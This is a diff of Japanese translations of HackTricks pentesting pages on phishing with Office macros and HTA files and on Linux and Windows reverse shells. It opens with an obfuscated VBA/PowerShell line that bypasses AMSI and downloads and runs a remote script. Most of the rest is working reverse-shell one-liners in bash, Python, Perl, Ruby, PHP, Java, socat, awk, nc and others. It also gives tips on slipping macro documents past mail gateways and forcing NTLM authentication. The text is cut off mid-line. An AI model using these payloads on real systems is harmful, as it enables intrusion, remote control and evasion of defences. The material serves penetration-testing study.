CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
@ -76,12 +74,12 @@ proc.Create "powershell <beacon line generated>
```
#### メタデータの手動削除
**ファイル > 情報 > ドキュメントの検査 > ドキュメントの検査**に移動し、ドキュメント検査ツールを表示します。**検査**をクリックし、**ドキュメントのプロパティと個人情報**の横にある**すべて削除**をクリックします。
**ファイル > 情報 > ドキュメントの検査 > ドキュメントの検査** に移動し、Document Inspector が表示されます。**検査** をクリックし、**ドキュメントのプロパティと個人情報** の隣にある **すべて削除** をクリックします。
#### ドキュメントの拡張子
作業が終了したら、**保存形式**のドロップダウンメニューから**`.docx`**を**Word 97-2003 `.doc`**に変更します。\
これは、**マクロを`.docx`内に保存することはできない**ため、マクロ有効な**`.docm`**拡張子には**スティグマ**があります(たとえば、サムネイルアイコンには大きな`!`が表示され、一部のウェブ/メールゲートウェイで完全にブロックされます)。したがって、この**古い`.doc`拡張子が最善の妥協策**です。
作業が完了したら、**保存形式** ドロップダウンから、**`.docx`** から **Word 97-2003 `.doc`** に形式を変更します。\
これは、**`.docx` 内にマクロを保存できない** ためです。また、マクロ有効な **`.docm`** 拡張子には **スティグマ** があります(たとえば、サムネイルアイコンには大きな `!` が表示され、一部のウェブ/メールゲートウェイが完全にブロックします)。そのため、この **レガシーの `.doc` 拡張子が最良の妥協策** です。
#### 悪意のあるマクロ生成ツール
@ -89,11 +87,11 @@ proc.Create "powershell <beacon line generated>
* [**macphish**](https://github.com/cldrn/macphish)
* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
## HTAファイル
## HTA ファイル
HTAは、**HTMLと1つ以上のスクリプト言語**VBScriptとJScriptで構成されるWindowsプログラムです。HTMLはユーザーインターフェースとプログラムロジックの生成に使用されます。HTAは、ブラウザのセキュリティモデルの制約なしで実行されるため、「完全に信頼された」アプリケーションとして実行されます。
HTA は、**HTML と VBScript、JScript などのスクリプト言語を組み合わせた Windows プログラム** です。これは、ブラウザのセキュリティモデルの制約なしに **"完全に信頼された" アプリケーションとして実行** されるユーザーインターフェースを生成します。
HTAは、通常**Internet Explorerと一緒にインストール**される**`mshta.exe`**を使用して実行されます。したがって、IEがアンインストールされている場合、HTAは実行できません。
HTA**`mshta.exe`** を使用して実行され、通常は **Internet Explorer と一緒にインストール** されるため、**`mshta` は IE に依存** しています。したがって、IE がアンインストールされている場合、HTA は実行できません。
```html
<--! Basic HTA Execution -->
<html>
@ -150,7 +148,7 @@ self.close
```
## NTLM認証の強制
**リモートでNTLM認証を強制する方法はいくつかあります**。たとえば、ユーザーがアクセスするメールやHTMLに**見えない画像**を追加することができますHTTP MitMでも可能ですか。または、被害者に**フォルダを開くだけで認証をトリガーするファイルのアドレス**を送信することできます。
**リモートでNTLM認証を強制する**方法はいくつかあります。たとえば、ユーザーがアクセスするであろう電子メールやHTMLに**見えない画像**を追加したりHTTP MitMでも可能、被害者に**フォルダを開くだけで認証をトリガーするファイルのアドレス**を送信することできます。
**以下のページでこれらのアイデアやその他の情報をチェックしてください:**
@ -164,7 +162,7 @@ self.close
### NTLMリレー
ハッシュや認証情報だけでなく、**NTLMリレーアタックも実行できることを忘れないでください**:
ハッシュや認証情報を盗むだけでなく、**NTLMリレーアタックを実行**することもできることを忘れないでください:
* [**NTLMリレーアタック**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
* [**AD CS ESC8証明書へのNTLMリレー**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
@ -173,10 +171,10 @@ self.close
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけてください
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
</details>

83
generic-methodologies-and-resources/shells/linux.md
View file

@ -6,17 +6,17 @@
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* **HackTricks で企業を宣伝したい**または**HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**フォローする**
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **と** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f)または[**telegram グループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**フォロー**する
* **ハッキングトリックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHub リポジトリに PR を提出する
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて、迅速に修正できるようにしましょう。Intruder は攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリやクラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
最も重要な脆弱性を見つけて修正を迅速化します。Intruder は攻撃面を追跡し、積極的な脅威スキャンを実行し、API から Web アプリやクラウドシステムまでの技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -54,11 +54,11 @@ echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMSc
```
#### シェルの説明
1. **`bash -i`**: このコマンドの部分は、インタラクティブ(`-i`)なBashシェルを開始します。
2. **`>&`**: このコマンドの部分は、**標準出力(`stdout`)と標準エラー(`stderr`)を同じ宛先にリダイレクト**するための短縮表記です。
3. **`/dev/tcp/<ATTACKER-IP>/<PORT>`**: これは、指定されたIPアドレスとポートへのTCP接続を表す特別なファイルです。
1. **`bash -i`**: この部分のコマンドは、インタラクティブ(`-i`)なBashシェルを起動します。
2. **`>&`**: この部分のコマンドは、**標準出力(`stdout`)と標準エラー(`stderr`)を同じ場所にリダイレクト**するための短縮表記です。
3. **`/dev/tcp/<ATTACKER-IP>/<PORT>`**: これは、指定たIPアドレスとポートへのTCP接続を表す特別なファイルです。
* **出力とエラーストリームをこのファイルにリダイレクト**することで、コマンドはインタラクティブシェルセッションの出力を攻撃者のマシンに送信します。
4. **`0>&1`**: このコマンドの部分は、**標準入力(`stdin`)を標準出力(`stdout`)と同じ宛先にリダイレクト**します。
4. **`0>&1`**: この部分のコマンドは、**標準入力(`stdin`)を標準出力(`stdout`)と同じ場所にリダイレクト**します。
### ファイルを作成して実行
```bash
@ -67,14 +67,15 @@ wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.s
```
## フォワードシェル
**LinuxマシンのWebアプリでRCE**がある場合、Iptablesルールや他の種類のフィルタリングにより**リバースシェルを取得できない**場合があります。この"シェル"を使用すると、被害システム内でパイプを使用してそのRCEを介してPTYシェルを維持できます。\
LinuxベースのWebアプリケーション内で**RCE脆弱性**に遭遇した場合、Iptablesルールや他のフィルタの存在により、**リバースシェルの取得が困難になる**ことがあります。そのようなシナリオでは、パイプを使用して侵害されたシステム内でPTYシェルを作成することを検討してください。
コードは[**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)にあります。
次のように変更する必要があります:
- 脆弱なホストのURL
- ペイロードの接頭辞と接尾辞(あれば)
- ペイロードの送信方法(ヘッダ?データ?追加情報?)
- ペイロードの送信方法(ヘッダ?データ?追加情報?)
その後、**コマンドを送信**したり、**`upgrade`コマンドを使用**して完全なPTYを取得したりできますパイプは約1.3秒の遅延で読み取られ、書き込まれます)。
@ -94,7 +95,7 @@ bash -c "$(curl -fsSL gsocket.io/x)"
```
## Telnet
Telnetは、ネットワーク上でコンピュータ間で通信するためのプロトコルです。通常、Telnetを使用してリモートシステムに接続し、コマンドを実行することができます。 Telnetはセキュリティ上のリスクがあるため、代わりにSSHなどのより安全なプロトコルを使用することが推奨されています。
Telnetは、ネットワーク上でコンピューターにリモートアクセスするためのプロトコルです。通常、Telnetを使用してリモートシェルに接続し、コマンドを実行することができます。 Telnetはセキュリティ上のリスクがあるため、代わりにSSHなどのより安全なプロトコルを使用することが推奨されています。
```bash
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
@ -107,17 +108,15 @@ rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-I
```bash
while true; do nc -l <port>; done
```
```
コマンドを送信するには、それを書き留め、Enter キーを押し、CTRL+D キーを押しますSTDIN を停止するため)
**被害者**
```
Send the command write it down, press enter and press CTRL+D (to stop STDIN)
```bash
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
```
## Python
## パイソン
Pythonは、多くのハッカーにとってお気に入りのスクリプト言語です。Pythonは、シンプルで読みやすく、多くのOSで動作するため、ハッキングに最適です。Pythonは、ネットワークスキャン、データ解析、Webスクレイピングなど、さまざまなハッキングタスクに使用されます。Pythonの豊富なライブラリとモジュールは、ハッキングプロジェクトを効率的に実行するのに役立ちます。
```bash
#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
@ -127,21 +126,21 @@ python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socke
```
## Perl
Perlは、多くのUnixシステムで利用可能なスクリプト言語であり、シェルスクリプトの代替として使用されることがあります。Perlスクリプトは、システム管理、ログ解析、データ変換などのタスクに広く使用されています。Perlは、強力なテキスト処理機能を備えており、システムやネットワークの自動化に役立ちます。
Perlは、多くのUnixシステムで利用可能なスクリプト言語であり、シェルスクリプトの代替として使用されることがあります。Perlスクリプトは、システム管理、ログ解析、データ変換などのタスクに広く使用されています。Perlは、強力なテキスト処理機能を備えており、システム管理者やハッカーにとって便利なツールとなっています。
```bash
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
## Ruby
Rubyは、多くのハッカーにとって人気のあるスクリプト言語です。Rubyスクリプトを使用して、シェルを介してシステムにアクセスし、機密情報を盗むことができます。Rubyは、システムにバックドアを作成するためにも使用されます。
Rubyは、多くのハッカーにとって人気のあるスクリプト言語です。Rubyスクリプトを使用して、シェルを介してシステムにアクセスし、様々な操作を実行することができます。Rubyスクリプトを使用すると、システムに対する柔軟なアクセス権を得ることができます。
```bash
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
## PHP
PHPHypertext Preprocessorは、Web開発に広く使用されるスクリプト言語です。PHPは、サーバーサイドで実行され、動的なWebページを生成するために使用されます。PHPは、HTMLに埋め込んで使用することができ、データベースとの連携も容易です。
PHPHypertext Preprocessorは、Web開発に広く使用されるスクリプト言語です。PHPは、サーバーサイドで実行され、動的なWebページを生成するために使用されます。PHPは、HTMLに埋め込んで使用することができ、データベースとの連携やフォームの処理など、さまざまなWeb開発タスクに適しています。
```php
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
@ -155,7 +154,7 @@ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```
## Java
Javaは、オブジェクト指向プログラミング言語であり、多くのプラットフォームで使用されています。Javaは、セキュリティ、パフォーマンス、および信頼性に焦点を当てて設計されており、多くの企業や開発者によって広く採用されています。Javaは、Webアプリケーション、モバイルアプリケーション、ビッグデータ処理など、さまざまな用途で使用されています。
Javaは、オブジェクト指向プログラミング言語であり、多くのプラットフォームで使用されています。Javaは、セキュリティ、パフォーマンス、および信頼性に焦点を当てて設計されており、多くの企業や開発者によって広く採用されています。Javaのセキュリティモデルは、サンドボックス環境とセキュリティマネージャーを使用して、悪意のあるコードの実行を防ぎます。Javaのセキュリティに関する最新情報は、公式のOracle Javaセキュリティページで入手できます。
```bash
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
@ -163,14 +162,14 @@ p.waitFor()
```
## Ncat
Ncat is a feature-packed networking utility that reads and writes data across networks from the command line. It supports various protocols and offers many advanced features, making it a powerful tool for network debugging and exploration.
Ncatは、ネットワークのデバッグ、セキュリティ監査、およびネットワーク上のデータの転送など、さまざまなネットワーク関連タスクを実行するための強力なツールです。
```bash
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl
```
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて修正できるようにします。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリやクラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)今すぐ。
最も重要な脆弱性を見つけて修正できるようにします。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリやクラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -191,7 +190,7 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
```
## NodeJS
NodeJSは、JavaScriptランタイム環境であり、サーバーサイドでのスクリプト実行に使用されます。NodeJSは非同期イベント駆動型のアーキテクチャを持ち、高速で効率的なネットワークアプリケーションの構築に適しています。
NodeJSは、非同期イベント駆動のJavaScriptランタイム環境であり、サーバーサイドでのスクリプト実行に適しています。NodeJSは、Webアプリケーションやネットワークアプリケーションの開発に広く使用されています。
```javascript
(function(){
var net = require("net"),
@ -266,7 +265,7 @@ victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
```
## Awk
Awkは、テキストとデータ処理のための強力なプログラミング言語です。Awkは、行指向のプログラミング言語であり、Linuxシェルスクリプト内で使用されることがよくあります。Awkは、パターンスキャンと処理言語として設計されており、ファイルやパイプラインからの入力を処理し、指定されたパターンに一致する行を検索して処理することができます。Awkは、シェルスクリプト内でのデータ処理やフィルタリングに非常に便利です。
Awkは、テキストと数値の処理に特化した強力なプログラミング言語です。Awkは、行指向のプログラミング言語であり、Linuxシェルスクリプト内で使用されることがよくあります。Awkは、パターンスキャンと処理言語として設計されており、ファイルやパイプラインからの入力を処理し、指定されたパターンに一致する行やフィールドを抽出して処理することができます。Awkは、シェルスクリプト内でのデータ処理やレポート生成など、さまざまな用途に使用されます。
```bash
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```
@ -290,7 +289,7 @@ export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | gre
### Gawk
Gawkは、テキスト処理とパターンスキャンに特化した強力なプログラミング言語です。Linuxシェルスクリプト内で使用され、パイプ処理やファイル処理に便利です。
Gawkは、テキスト処理とパターンスキャンに特化した強力なプログラミング言語です。Linuxシェルスクリプト内で使用され、パイプ処理やファイル処理などのタスクを自動化するのに役立ちます。
```bash
#!/usr/bin/gawk -f
@ -315,17 +314,16 @@ close(Service)
```
## Xterm
最も簡単な形式のリバースシェルの1つは、xtermセッションです。次のコマンドをサーバーで実行する必要があります。それは、あなた10.0.0.1にTCPポート6001で接続しようとします。
これは、ポート6001であなたのシステムに接続しようとします
```bash
xterm -display 10.0.0.1:1
```
以下は、X-Server (:1 - TCPポート6001でリッスンする)をキャッチするための方法です。これを行う1つの方法は、Xnestを使用することですあなたのシステムで実行する必要があります:
```bash
Xnest :1
```
必要なのは、ターゲットがあなたに接続するための認証を行うことです(コマンドはあなたのホストでも実行されます):
リバースシェルをキャッチするために使用できるものポート6001でリッスンする:
```bash
# Authorize host
xhost +targetip
# Listen
Xnest :1
```
## Groovy
@ -337,18 +335,15 @@ String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
## 参考文献
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell)
* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}
{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell" %}
{% embed url="https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/" %}
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
重要な脆弱性を見つけて修正を迅速化します。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリクラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
最も重要な脆弱性を見つけて修正を迅速化します。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -359,10 +354,10 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手す
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合は**、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**をフォローする**
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
</details>

179
generic-methodologies-and-resources/shells/windows.md
View file

@ -9,7 +9,7 @@ HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で **フォロー**する
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で **フォロー**する
* **ハッキングトリックを共有するには、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
</details>
@ -24,23 +24,37 @@ HackTricks をサポートする他の方法:
## Lolbas
ページ [lolbas-project.github.io](https://lolbas-project.github.io/) は、Linux向けの [https://gtfobins.github.io/](https://gtfobins.github.io/) と同様に、Windows向けです。\
明らかに、**WindowsにはSUIDファイルやsudo権限はありません**が、いくつかの**バイナリ**が**任意のコードを実行**するなどの予期しないアクションを実行する方法を知っていると便利です。
ページ [lolbas-project.github.io](https://lolbas-project.github.io/) は、Linux用の [https://gtfobins.github.io/](https://gtfobins.github.io/) に似たWindows向けです。\
明らかに、**Windows にはSUIDファイルやsudo権限はありません**が、いくつかの **バイナリ** が **任意のコードを実行する**などの予期しないアクションを実行する方法を知っていると便利です。
## NC
```bash
nc.exe -e cmd.exe <Attacker_IP> <PORT>
```
## SBD
**sbd**は、ポータブルで強力な暗号化を提供するよう設計されたNetcatのクローンです。Unix系オペレーティングシステムとMicrosoft Win32で動作します。sbdには、AES-CBC-128 + HMAC-SHA1暗号化Christophe Devineによる、プログラムの実行-eオプション、ソースポートの選択、遅延を伴う連続再接続、その他いくつかの便利な機能が備わっています。sbdはTCP/IP通信のみをサポートしています。sbd.exeKali Linuxディストリビューションの一部/usr/share/windows-resources/sbd/sbd.exeは、Netcatの代替としてWindowsボックスにアップロードできます。
**[sbd](https://www.kali.org/tools/sbd/)は、携帯可能で安全なNetcatの代替です**。UnixライクなシステムとWin32で動作します。強力な暗号化、プログラムの実行、ソースポートのカスタマイズ、継続的な再接続などの機能を備えており、TCP/IP通信の多目的なソリューションを提供します。Windowsユーザーにとって、Kali Linuxディストリビューションからのsbd.exeバージョンは、Netcatの信頼性のある代替として使用できます。
```bash
# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444
# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)
```
## Python
## パイソン
```bash
#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in 